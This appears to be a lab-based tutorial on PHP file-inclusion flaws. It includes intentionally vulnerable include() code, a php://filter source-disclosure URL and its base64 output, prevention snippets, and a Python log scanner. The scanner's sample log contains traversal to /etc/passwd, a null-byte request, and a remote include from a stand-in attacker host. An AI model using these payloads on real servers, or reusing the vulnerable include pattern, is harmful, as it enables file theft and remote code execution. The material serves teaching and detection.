Remote File Inclusion & Local File Inclusion (RFI & LFI)

...
$page = $_GET["page"]; // or via POST: $_POST["page"]. The point is that user-supplied data reaches the server.
include($page.".php"); // This is vulnerable to RFI and LFI
$base_url = "https://example.com/";
include($base_url.$page.".php"); // This is vulnerable to LFI only
...

Local File Inclusion (LFI)

Straight Forward LFI

[Figure: A Very Useful Website]
[Figure: A Very Useful Website (2)]
[Figure: Normal.txt Content]
[Figure: LFI Exploitation]
[Figure: Example of Path Traversal]

Null Byte Injection

# pretty secure
$page = $_GET["page"];
include($page.".php"); # appending ".php" is meant to prevent including anything other than a PHP file

PHP Filters Base64 Conversion

[Figure: Very Useful Website]
[Figure: Source Code]
http://localhost/lab/rfi/vuln.php?page=php://filter/convert.base64-encode/resource=vuln.php
[Figure: The Display of Inclusion Base64 Filter]
PGh0bWw+DQoJPGJvZHk+DQoJCTxhIGhyZWYgPSAiP3BhZ2U9bm9ybWFsLnR4dCI+Q2xpY2sgbWUgdG8gc2hvdyBjb250ZW50ITwvYT4NCgkJPD9waHANCg0KCQlpZihpc3NldCgkX0dFVFsicGFnZSJdKSl7DQoJCQkkcGFnZSA9ICRfR0VUWyJwYWdlIl07DQoJCQlpbmNsdWRlKCRwYWdlKTsNCgkJfQ0KDQoJCT8+DQoJPC9ib2R5Pg0KPC9odG1sPg0K
[Figure: Base64 Decoding of the Source Code]

Attack Combination

Remote File Inclusion (RFI)

Preparation

[Figure: File Manager Display]

Strategy

[Figure: RFI Schema]
[Figure: This is the Code on The Attacker's Server (rfi-exploit.php)]
[Figure: RFI Attack]
[Figure: Proof of Concept Where the RFI Code is Executed]
[Figure: The Exploit Code]
[Figure: Our RFI Exploit]
[Figure: RFI Exploitation]
[Figure: Sad Story of RFI]

Prevention

$lang = $_GET["lang"];
if($lang === "en"){
    include("en_lang.php");
} else if($lang === "id"){
    include("id_lang.php");
} else {
    include("en_lang.php");
}

include("en_lang.php"); // no user input reaches include() at all

include("path/to/the/included/file/en_lang.php"); // include by a fixed, explicit path
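An added example (Python, not code from the article) that takes the page's prevention advice and its attack indicators from the defender's side: `resolve_include` generalises the allowlist above with a realpath containment check, and `scan_log` flags the traversal, null-byte, php://filter and remote-URL patterns from the earlier sections in constructed access-log lines. The log lines, the `attacker.invalid` host and the parameter names are assumptions.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (not from the article): traversal, encoded traversal
# plus null byte, php://filter, a remote URL (RFI), then one benign request.
SAMPLE_LOG = """\
GET /lab/rfi/vuln.php?page=../../../../etc/passwd HTTP/1.1
GET /lab/rfi/vuln.php?page=..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1
GET /lab/rfi/vuln.php?page=php://filter/convert.base64-encode/resource=vuln.php HTTP/1.1
GET /lab/rfi/vuln.php?page=http://attacker.invalid/rfi-exploit HTTP/1.1
GET /lab/rfi/vuln.php?page=normal.txt HTTP/1.1
"""

def classify_value(value: str) -> list[str]:
    """Name the file-inclusion indicators present in one query-string value."""
    v = unquote(value)  # parse_qs decoded once; decode again to catch %252e-style double encoding
    findings = []
    if re.search(r"\.\.[/\\]", v):
        findings.append("path-traversal")
    if "\x00" in v:
        findings.append("null-byte")
    if re.match(r"(?i)php://", v):
        findings.append("php-wrapper")
    if re.match(r"(?i)(https?|ftp)://", v):
        findings.append("remote-include")
    return findings

def scan_log(log: str) -> list[tuple[str, list[str]]]:
    """Return (request line, sorted indicators) for each request carrying any indicator."""
    hits = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        found = []
        for values in parse_qs(urlsplit(parts[1]).query, keep_blank_values=True).values():
            for value in values:
                found.extend(classify_value(value))
        if found:
            hits.append((line, sorted(set(found))))
    return hits

def resolve_include(value: str, allowed: dict[str, str], base_dir: str) -> str:
    """Allowlist as on the page, generalised: the request value only selects a fixed
    filename (default: allowed['default']); realpath containment is a second check."""
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, allowed.get(value, allowed["default"])))
    if os.path.commonpath([base, full]) != base:
        raise ValueError("resolved path escaped the include directory")
    return full
```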

Closing
